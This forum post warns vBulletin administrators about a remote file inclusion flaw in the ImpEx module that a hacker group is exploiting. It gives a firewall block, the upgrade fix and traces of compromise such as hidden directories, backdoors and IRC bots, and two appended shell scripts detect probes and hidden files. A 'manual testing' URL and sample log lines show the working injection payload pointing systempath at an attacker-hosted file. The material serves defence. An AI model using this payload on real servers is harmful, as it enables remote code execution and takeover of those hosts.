SplitInfinity Here letting you know that....
There is a known Turkish hacker group targeting the adult industry.
The vBulletin ImpEx module contains a remote file inclusion flaw that may allow a remote attacker to execute arbitrary code. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable before using it in an include. This allows an attacker to point the script at a file on a remote host containing arbitrary PHP code, which the vulnerable script then executes with the web server's privileges.
First, you should immediately block this class C:
ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all
For some reason, they keep using the same ips. Lame hackers. :-)
I have tracked them down and done some stuff to stop them from what they are doing.... however you should be warned that if you run vBulletin they will be hitting you soon! So far they have taken out over 10,000 sites as reported on securityfocus.
Vulnerability Classification:
* Remote/Network Access Required
* Input Manipulation
* Loss Of Integrity
* Exploit Available
* Verified
* Web Related
Products:
* vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )
Solution:
Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Manual Testing Notes:
http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?
Where the hackers play...
http://www.sanalinfaz.com/forumm/sho...=6140#post6140
They will use the exploit to install mech and eggdrop IRC bots, backdoors and more on your server. I list below some common places they plant their files....
Places to check:
/tmp
/var/tmp/
/var/tmp/ssh
/var/tmp/root
Look for a file simply named "a"; it is a backdoor.
That list is NOT all inclusive, as different groups will run different root kits for the same exploit....
Look for hidden directories by hitting TAB.
Example:
ls -la
total 20
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58
drwxrwxrwt 3 root root 4096 May 13 13:20 .
drwxr-xr-x 24 root root 4096 Jan 29 20:50 ..
Notice the seemingly empty one on top?
If I type: cd [TAB]
I get this:
cd \ /multi/
They used control characters to hide the name of the directory. It becomes exposed when tab completion has a go at it. They basically named the directory " " space... :-)
So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit they run is in there. :-)
total 1360
drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
-rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen
-rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen
-rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen
-rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen
-rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech
-rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
-rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen
-rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen
-rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen
-rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen
-rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen
-rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen
-rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen
-rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen
-rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen
-rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen
-rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen
-rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen
-rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen
-rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
-rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen
-rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen
Etc....
the list goes on
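An added example, not from the original post: a shell check over web server access logs for the ImpExData.php systempath probe described in the advisory text near the top of the post. The log lines are constructed samples in Apache combined format; the hostnames, timestamps, paths and the addresses outside the 85.107.191.0/24 range named in the post are invented for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Hunts web server access logs for
# requests to ImpExData.php whose systempath parameter carries a remote URL,
# the include-from-remote-host pattern the advisory text describes.
# The log lines below are constructed samples in Apache combined format;
# hostnames, timestamps, paths and the non-85.107.191.x addresses are invented.

SAMPLE_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.10 - - [13/May/2006:13:20:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
85.107.191.45 - - [13/May/2006:13:20:07 +0000] "GET /impex/ImpExData.php?systempath=http://evil.example/evil.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.803"
198.51.100.7 - - [13/May/2006:13:21:30 +0000] "GET /impex/ImpExData.php?systempath=/home/forum/impex HTTP/1.1" 200 1344 "-" "Mozilla/5.0"
85.107.191.88 - - [13/May/2006:13:22:02 +0000] "GET /impex/ImpExData.php?systempath=ftp%3A%2F%2Fevil.example%2Fevil.txt%3F HTTP/1.1" 200 812 "-" "Wget/1.10"
EOF

# Print every request line that hits ImpExData.php with systempath set to a
# remote scheme. The scheme is matched case-insensitively and in both raw (":")
# and percent-encoded ("%3A") form so a lightly obfuscated probe is still
# caught; a local path in systempath (third sample line) is not flagged.
find_impex_rfi() {
    grep -iE 'ImpExData\.php\?[^" ]*systempath=(https?|ftp)(:|%3A)' "$1"
}

# Number of such requests. Anything above zero on a vBulletin host means the
# ImpEx directory and the scratch directories named in the post need a look.
count_impex_rfi() {
    find_impex_rfi "$1" | wc -l | tr -d ' '
}

# Distinct source addresses of the probes, ready for a firewall deny list.
impex_rfi_sources() {
    find_impex_rfi "$1" | awk '{ print $1 }' | sort -u
}

echo "RFI probes against ImpExData.php: $(count_impex_rfi "$SAMPLE_LOG")"
echo "Sources:"
impex_rfi_sources "$SAMPLE_LOG"
```

Run it against the real log with `count_impex_rfi /var/log/httpd/access_log`; the pattern only looks at the request line, so rotated or compressed logs need to be fed through `zcat` first.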
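Also added here, not from the post: a shell script that automates the "places to check" advice above (scratch directories, the backdoor file "a", and entries hidden behind whitespace, control characters or dot-only names) on a constructed sample tree. The directory and file names it creates are invented to mirror the listing in the post; `-mindepth`/`-maxdepth` are GNU/BSD find extensions. One caveat the post does not mention: a kernel-level rootkit can hide entries from `ls` and `find` entirely, so run checks like these from a trusted rescue boot, or at least with known-good statically linked binaries, rather than trusting the compromised host's own tools.

```shell
#!/bin/sh
# Added example, not from the original post. Automates the "places to check"
# above on a constructed sample tree; point the hunt_* functions at /tmp,
# /var/tmp and /dev/shm on a real host. -mindepth/-maxdepth are GNU/BSD find
# extensions. Assumes the attacker tricks described in the post: a directory
# named " " (one space) and a file named "a" in a scratch directory.

# Entries one level below $1 whose name contains whitespace or a control
# character, or consists only of dots (the "..." trick). Such names are easy
# to overlook in plain "ls -la" output.
hunt_hidden_names() {
    find "$1" -mindepth 1 -maxdepth 1 \
        \( -name '*[[:space:][:cntrl:]]*' -o -name '...*' \) -print
}

# The post's indicator of compromise: a file simply named "a" within a few
# levels of a scratch directory.
hunt_backdoor_a() {
    find "$1" -maxdepth 3 -type f -name a -print
}

# Show every entry name byte by byte, so a hidden name is exposed without
# relying on tab completion.
reveal_names() {
    ls -A "$1" | od -c
}

# --- constructed sample tree (invented names mirroring the post's listing) ---
SCRATCH="$(mktemp -d)"
trap 'rm -rf "$SCRATCH"' EXIT
mkdir -p "$SCRATCH/ /multi" "$SCRATCH/..." "$SCRATCH/sess"
: > "$SCRATCH/ /multi/acycmech"       # bot binary inside the hidden " " directory
: > "$SCRATCH/a"                       # the "a" backdoor
: > "$SCRATCH/sess/sess_1234"          # an ordinary-looking session file

echo "== entries with hidden names under $SCRATCH =="
hunt_hidden_names "$SCRATCH"
echo "== backdoor file 'a' =="
hunt_backdoor_a "$SCRATCH"
echo "== raw listing =="
reveal_names "$SCRATCH"
```

On a live host the sample tree is irrelevant; loop the two `hunt_*` functions over `/tmp /var/tmp /dev/shm` and anything they print deserves a closer look with `ls -la` inside the flagged directory, the way the post does with `cd \ /multi/`.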